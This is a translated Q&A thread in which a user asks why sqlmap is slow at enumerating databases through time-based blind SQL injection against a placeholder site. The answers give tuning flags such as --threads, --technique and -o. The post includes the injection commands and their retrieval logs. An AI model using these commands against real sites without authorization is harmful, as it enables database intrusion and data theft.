sqlmap太慢了

Posted 2023-02-19

【中文标题】sqlmap太慢了

【英文标题】：sqlmap is too slow

【发布时间】：2012-07-05 06:46:16

【问题描述】：

这是一个例子。只是想列出数据库：

python sqlmap.py -u "http://somesite.com/?id=1" --dbs

[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_

您可以在时间戳中看到列出 1 个数据库名称大约需要 3 分钟，它逐个字符进行，每个字符大约需要 7 秒。我在youtube上看到的教程超快... 我该怎么做才能加快速度？我试过弄乱 .conf

谢谢。

【问题讨论】：

somesite.com 的网络延迟是多少？您可以通过简单地执行ping somesite.com 来检查这一点。如果延迟很高，在逐个字符测试时执行盲注 SQL 会很慢。

哇，这可能是问题所在。知道为什么吗？我认为这不是网站的错，因为它在浏览器中加载速度非常快。但是请求在 ping 中超时。

【参考方案1】：

您还可以使用 -o 开关进行一些优化。也可以试试 --technique=BEUS

【参考方案2】：

somesite.com 的网络延迟是多少？您可以通过简单地执行 ping somesite.com 来检查这一点。如果延迟很高，那么在逐个字符测试时，执行盲注 SQL 会很慢。 – rgerganov 7 月 4 日 19:43

【参考方案3】：

使用更多线程。默认为 1：

       --threads=THREADS
          Max number of concurrent HTTP(s) requests (default 1)

【参考方案4】：

您可以像这样使用快速响应。 sqlmap -u "http://somesite.com/?id=1" --time-sec 15

【讨论】：

这将使基于时间的注入测试所需的时间增加三倍。默认为 5。对于此参数；越低，dbms 响应越快。